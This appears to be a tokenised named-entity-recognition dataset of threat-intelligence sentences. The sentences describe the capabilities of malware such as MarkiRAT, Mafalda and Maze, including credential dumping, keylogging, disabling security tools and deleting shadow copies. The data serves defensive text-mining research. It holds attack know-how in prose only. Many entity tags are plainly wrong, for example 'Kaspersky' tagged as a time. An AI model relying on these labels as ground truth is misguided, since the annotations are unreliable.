"10", - "minutes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "captures", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "been", - "packed", - "with", - "NSIS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "base64", - "encoding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "has", - "used", - "AES", - "to", - "exfiltrate", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "collects", - "the", - "hostname", - "of", - "the", - "target", - "computer." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "collects", - "the", - "MAC", - "address", - "of", - "the", - "target", - "computer", - "and", - "other", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "uses", - "the", - "<code>netsh", - "wlan", - "show", - "networks", - "mode=bssid</code>", - "and", - "<code>netsh", - "wlan", - "show", - "interfaces</code>", - "commands", - "to", - "list", - "all", - "nearby", - "WiFi", - "networks", - "and", - "connected", - "interfaces." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "takes", - "photos", - "from", - "the", - "computer’s", - "web", - "camera." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Machete", - "uses", - "HTTP", - "for", - "Command", - "&", - "Control." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "`AdjustTokenPrivileges()`", - "to", - "elevate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "collect", - "the", - "contents", - "of", - "the", - "`%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User", - "Data\\LocalState`", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "delete", - "Windows", - "Event", - "logs", - "by", - "invoking", - "the", - "`OpenEventLogW`", - "and", - "`ClearEventLogW`", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "collect", - "files", - "and", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "search", - "for", - "debugging", - "tools", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "decrypt", - "files", - "and", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "has", - "been", - "obfuscated", - "and", - "contains", - "encrypted", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "send", - "network", - "system", - "data", - "and", - "files", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "establish", - "an", - "SSH", - "connection", - "from", - "a", - "compromised", - "host", - "to", - "a", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "search", - "for", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "download", - "additional", - "files", - "onto", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "conduct", - "mouse", - "event", - "logging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "create", - "a", - "named", - "pipe", - "to", - "listen", - "for", - "and", - "send", - "data", - "to", - "a", - "named", - "pipe-based", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "dump", - "password", - "hashes", - "from", - "`LSASS.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "place", - "retrieved", - "files", - "into", - "a", - "destination", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "create", - "a", - "token", - "for", - "a", - "different", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "manipulate", - "the", - "system", - "registry", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "a", - "variety", - "of", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "raw", - "TCP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "port-knocking", - "to", - "authenticate", - "itself", - "to", - "another", - "implant", - "called", - "Cryshell", - "to", - "establish", - "an", - "indirect", - "connection", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "execute", - "PowerShell", - "commands", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "collect", - "a", - "Chrome", - "encryption", - "key", - "used", - "to", - "protect", - "browser", - "cookies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "enumerate", - "running", - "processes", - "on", - "a", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "enumerate", - "Registry", - "keys", - "with", - "all", - "subkeys", - "and", - "values." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "take", - "a", - "screenshot", - "of", - "the", - "target", - "machine", - "and", - "save", - "it", - "to", - "a", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "search", - "for", - "a", - "variety", - "of", - "security", - "software", - "programs,", - "EDR", - "systems,", - "and", - "malware", - "analysis", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "create", - "a", - "remote", - "service,", - "let", - "it", - "run", - "once,", - "and", - "then", - "delete", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "encode", - "data", - "using", - "Base64", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "encrypt", - "its", - "C2", - "traffic", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "collect", - "the", - "computer", - "name", - "and", - "enumerate", - "all", - "drives", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "the", - "`GetAdaptersInfo`", - "function", - "to", - "retrieve", - "information", - "about", - "network", - "adapters", - "and", - "the", - "`GetIpNetTable`", - "function", - "to", - "retrieve", - "the", - "IPv4", - "to", - "physical", - "network", - "address", - "mapping", - "table." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "the", - "<code>GetExtendedTcpTable</code>", - "function", - "to", - "retrieve", - "information", - "about", - "established", - "TCP", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Mafalda", - "can", - "execute", - "shell", - "commands", - "using", - "`cmd.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MailSniper", - "can", - "be", - "used", - "to", - "obtain", - "account", - "names", - "from", - "Exchange", - "and", - "Office", - "365", - "using", - "the", - "<code>Get-GlobalAddressList</code>", - "cmdlet." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MailSniper", - "can", - "be", - "used", - "for", - "password", - "spraying", - "against", - "Exchange", - "and", - "Office", - "365." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MailSniper", - "can", - "be", - "used", - "for", - "searching", - "through", - "email", - "in", - "Exchange", - "and", - "Office", - "365", - "environments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "use", - "BITS", - "Utility", - "to", - "connect", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "capture", - "clipboard", - "content." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "upload", - "data", - "from", - "the", - "victim's", - "machine", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "exfiltrate", - "locally", - "stored", - "data", - "via", - "its", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "look", - "for", - "files", - "carrying", - "specific", - "extensions", - "such", - "as:", - ".rtf,", - ".doc,", - ".docx,", - ".xls,", - ".xlsx,", - ".ppt,", - ".pptx,", - ".pps,", - ".ppsx,", - ".txt,", - ".gpg,", - ".pkr,", - ".kdbx,", - ".key,", - "and", - ".jpb." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "download", - "additional", - "files", - "and", - "tools", - "from", - "its", - "C2", - "server,", - "including", - "through", - "the", - "use", - "of", - "BITSAdmin." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "capture", - "all", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "store", - "collected", - "data", - "locally", - "in", - "a", - "created", - ".nfo", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "masquerade", - "as", - "<code>update.exe</code>", - "and", - "<code>svehost.exe</code>;", - "it", - "has", - "also", - "mimicked", - "legitimate", - "Telegram", - "and", - "Chrome", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "run", - "the", - "ShellExecuteW", - "API", - "via", - "the", - "Windows", - "Command", - "Shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "gather", - "information", - "from", - "the", - "Keepass", - "password", - "manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "search", - "for", - "different", - "processes", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "drop", - "its", - "payload", - "into", - "the", - "Startup", - "directory", - "to", - "ensure", - "it", - "automatically", - "runs", - "when", - "the", - "compromised", - "system", - "is", - "started." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "capture", - "screenshots", - "that", - "are", - "initially", - "saved", - "as", - "‘scr.jpg’." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "check", - "for", - "running", - "processes", - "on", - "the", - "victim’s", - "machine", - "to", - "look", - "for", - "Kaspersky", - "and", - "Bitdefender", - "antivirus", - "products." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "modify", - "the", - "shortcut", - "that", - "launches", - "Telegram", - "by", - "replacing", - "its", - "path", - "with", - "the", - "malicious", - "payload", - "to", - "launch", - "with", - "the", - "legitimate", - "executable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "check", - "for", - "the", - "Telegram", - "installation", - "directory", - "by", - "enumerating", - "the", - "files", - "on", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "obtain", - "the", - "computer", - "name", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "use", - "the", - "<code>GetKeyboardLayout</code>", - "API", - "to", - "check", - "if", - "a", - "compromised", - "host's", - "keyboard", - "is", - "set", - "to", - "Persian." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "retrieve", - "the", - "victim’s", - "username." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "initiate", - "communication", - "over", - "HTTP/HTTPS", - "for", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MarkiRAT", - "can", - "utilize", - "cmd.exe", - "to", - "execute", - "commands", - "in", - "a", - "victim's", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "is", - "capable", - "of", - "providing", - "Meterpreter", - "shell", - "access." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "is", - "capable", - "of", - "stealing", - "Outlook", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Purp", - "B-Purp", - "B-Purp" - ] - }, - { - "tokens": [ - "Matryoshka", - "uses", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "uses", - "reflective", - "DLL", - "injection", - "to", - "inject", - "the", - "malicious", - "library", - "and", - "execute", - "the", - "RAT." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Matryoshka", - "is", - "capable", - "of", - "keylogging." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "obfuscates", - "API", - "function", - "names", - "using", - "a", - "substitute", - "cipher", - "combined", - "with", - "Base64", - "encoding." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "can", - "establish", - "persistence", - "by", - "adding", - "Registry", - "Run", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "uses", - "rundll32.exe", - "in", - "a", - "Registry", - "Run", - "key", - "value", - "for", - "execution", - "as", - "part", - "of", - "its", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "can", - "establish", - "persistence", - "by", - "adding", - "a", - "Scheduled", - "Task", - "named", - "\"Microsoft", - "Boost", - "Kernel", - "Optimization\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Matryoshka", - "is", - "capable", - "of", - "performing", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "inserted", - "large", - "blocks", - "of", - "junk", - "code,", - "including", - "some", - "components", - "to", - "decrypt", - "strings", - "and", - "other", - "important", - "information", - "for", - "later", - "in", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "disrupted", - "systems", - "by", - "encrypting", - "files", - "on", - "targeted", - "machines,", - "claiming", - "to", - "decrypt", - "files", - "if", - "a", - "ransom", - "payment", - "is", - "made.", - "Maze", - "has", - "used", - "the", - "ChaCha", - "algorithm,", - "based", - "on", - "Salsa20,", - "and", - "an", - "RSA", - "algorithm", - "to", - "encrypt", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "disabled", - "dynamic", - "analysis", - "and", - "other", - "security", - "tools", - "including", - "IDA", - "debugger,", - "x32dbg,", - "and", - "OllyDbg.", - "It", - "has", - "also", - "disabled", - "Windows", - "Defender's", - "Real-Time", - "Monitoring", - "feature", - "and", - "attempted", - "to", - "disable", - "endpoint", - "protection", - "services." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "forged", - "POST", - "strings", - "with", - "a", - "random", - "choice", - "from", - "a", - "list", - "of", - "possibilities", - "including", - "\"forum\",", - "\"php\",", - "\"view\",", - "etc.", - "while", - "making", - "connection", - "with", - "the", - "C2,", - "hindering", - "detection", - "efforts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "injected", - "the", - "malware", - "DLL", - "into", - "a", - "target", - "process." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "used", - "the", - "“Wow64RevertWow64FsRedirection”", - "function", - "following", - "attempts", - "to", - "delete", - "the", - "shadow", - "volumes,", - "in", - "order", - "to", - "leave", - "the", - "system", - "in", - "the", - "same", - "state", - "as", - "it", - "was", - "prior", - "to", - "redirection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "attempted", - "to", - "delete", - "the", - "shadow", - "volumes", - "of", - "infected", - "machines,", - "once", - "before", - "and", - "once", - "after", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "operators", - "have", - "created", - "scheduled", - "tasks", - "masquerading", - "as", - "\"Windows", - "Update", - "Security\",", - "\"Windows", - "Update", - "Security", - "Patches\",", - "and", - "\"Google", - "Chrome", - "Security", - "Update\"", - "designed", - "to", - "launch", - "the", - "ransomware." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "delivered", - "components", - "for", - "its", - "ransomware", - "attacks", - "using", - "MSI", - "files,", - "some", - "of", - "which", - "have", - "been", - "executed", - "from", - "the", - "command-line", - "using", - "<code>msiexec</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "used", - "several", - "Windows", - "API", - "functions", - "throughout", - "the", - "encryption", - "process", - "including", - "IsDebuggerPresent,", - "TerminateProcess,", - "Process32FirstW,", - "among", - "others." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "decrypted", - "strings", - "and", - "other", - "important", - "information", - "during", - "the", - "encryption", - "process.", - "Maze", - "also", - "calls", - "certain", - "functions", - "dynamically", - "to", - "hinder", - "analysis." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "gathered", - "all", - "of", - "the", - "running", - "system", - "processes." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "has", - "created", - "a", - "file", - "named", - "\"startup_vrun.bat\"", - "in", - "the", - "Startup", - "folder", - "of", - "a", - "virtual", - "machine", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maze", - "operators", - "have", - "used", - "VirtualBox", - "and", - "a", - "Windows", - "7", - "virtual", - "machine", - "to", - "run", - "the", - "ransomware;", - "the", - "virtual", - "machine's", - "configuration", - "file", - "mapped", - "the", - "shared", - "network", - "drives", - "of", - "the", - "target", - "company,", - "presumably", - "so", - "Maze", - "can", - "encrypt", - "files", - "on", - "the", - "shared", - "drives", - "as", - "well", - "as", - "the", - "local", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 